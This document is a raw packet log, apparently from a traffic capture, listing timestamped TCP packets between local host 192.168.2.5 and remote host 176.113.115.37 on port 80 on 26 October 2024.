                                                Oct 26, 2024 08:56:09.366575003 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366578102 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366594076 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366602898 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366611958 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366619110 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366643906 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366662979 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366693020 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366708040 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366723061 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366730928 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366739035 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366749048 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366761923 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366764069 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366777897 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366790056 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366795063 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.366797924 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366820097 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.366837025 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.426610947 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.426636934 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.426673889 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.426693916 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.435972929 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436029911 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436037064 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436045885 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436060905 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436067104 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436088085 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436098099 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436254025 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436275005 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436290026 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436292887 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436305046 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436310053 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436320066 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.436326027 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436352015 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.436366081 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.437017918 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.437030077 CEST8049705176.113.115.37192.168.2.5
                                                Oct 26, 2024 08:56:09.437052965 CEST4970580192.168.2.5176.113.115.37
                                                Oct 26, 2024 08:56:09.437071085 CEST4970580192.168.2.5176.113.115.37
Oct 26, 2024 08:56:09.437210083 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.437232018 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.437242985 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.437246084 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.437268019 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.437283993 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.437294960 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.437309027 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.437328100 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.437340975 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.438040018 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.438072920 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553220987 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553289890 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553311110 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553328037 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553361893 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553380966 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553456068 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553456068 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553472996 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553505898 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553535938 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553543091 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553555965 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553591967 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553786993 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553845882 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553853035 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553888083 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553900003 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553921938 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553941965 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553956985 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.553966045 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.553992987 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.554007053 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.554048061 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.554649115 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.554702997 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.554711103 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.554737091 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.554755926 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.554769993 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.554788113 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.554816008 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.669989109 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670052052 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670113087 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670147896 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670183897 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670181036 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670181036 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670181036 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670221090 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670226097 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670226097 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670254946 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670264959 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670288086 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670299053 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670334101 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670344114 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670383930 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670403004 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670447111 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.670942068 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670974016 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.670994043 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671010971 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671037912 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671049118 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671273947 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671336889 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671343088 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671379089 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671395063 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671412945 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671421051 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671448946 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671461105 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671490908 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671916008 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671957970 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.671962023 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.671993017 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.672003984 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.672032118 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.786855936 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.786899090 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.786956072 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.786986113 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.786986113 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.786995888 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787050962 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787051916 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787050962 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787087917 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787106991 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787122965 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787142038 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787158012 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787170887 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787194014 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787209034 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787250996 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787431955 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787484884 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787520885 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787535906 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787544012 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787571907 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787606955 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.787623882 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787652016 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.787702084 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788109064 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788161039 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788182020 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788196087 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788227081 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788228989 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788247108 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788264990 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788281918 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788299084 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788311005 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788336039 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.788352966 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788391113 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.788930893 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.789004087 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.903832912 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.903867006 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.903883934 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.903908014 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.903925896 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.903924942 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.903960943 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.903996944 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904016018 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904047012 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904057026 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904062986 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904084921 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904103041 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904115915 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904131889 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904148102 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904153109 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904164076 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904180050 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.904185057 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904247999 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904247999 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.904247999 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905057907 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905088902 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905112028 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905121088 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905128956 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905143023 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905159950 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905170918 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905170918 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905174017 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.905185938 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905185938 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905200005 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.905215025 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.946547031 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.946583033 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:09.946610928 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:09.946634054 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.020839930 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.020864010 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.020879030 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.020886898 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.020895958 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.020972967 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.020993948 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021018028 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021033049 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021047115 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021064997 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021086931 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021155119 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021465063 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021507978 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021521091 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021543980 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021559954 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021565914 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021574974 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.021583080 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021605015 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.021615982 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.022022963 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.022047997 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.022063017 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.022069931 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.022087097 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.022104025 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.022123098 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.022136927 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.022162914 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.022177935 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.062621117 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.062637091 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.062722921 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138092041 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138143063 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138163090 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138235092 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138268948 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138300896 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138334036 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138369083 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138401985 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138437033 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138442993 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138443947 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138443947 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138443947 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138470888 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138506889 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138533115 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138533115 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138562918 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138667107 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138731956 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138786077 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138820887 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138854027 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138890028 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.138972998 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138972998 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138972998 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138972998 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.138973951 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.139445066 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.139498949 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.139533043 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.139650106 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.139651060 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.139651060 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.178675890 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.178700924 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.178719044 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.178747892 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.178786039 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.179379940 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.179406881 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.179430962 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.179455042 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254595041 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254622936 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254662991 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254664898 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254678965 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254681110 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254694939 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254699945 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254719019 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254731894 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254744053 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254776955 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254800081 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254817963 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254834890 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254848003 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254901886 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254915953 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254934072 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254934072 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254946947 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.254952908 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254968882 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.254981041 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255621910 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255667925 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255702972 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255716085 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255732059 CEST  80     49705  176.113.115.37  192.168.2.5
Oct 26, 2024 08:56:10.255739927 CEST  49705  80     192.168.2.5     176.113.115.37
Oct 26, 2024 08:56:10.255755901 CEST  49705  80     192.168.2.5     176.113.115.37
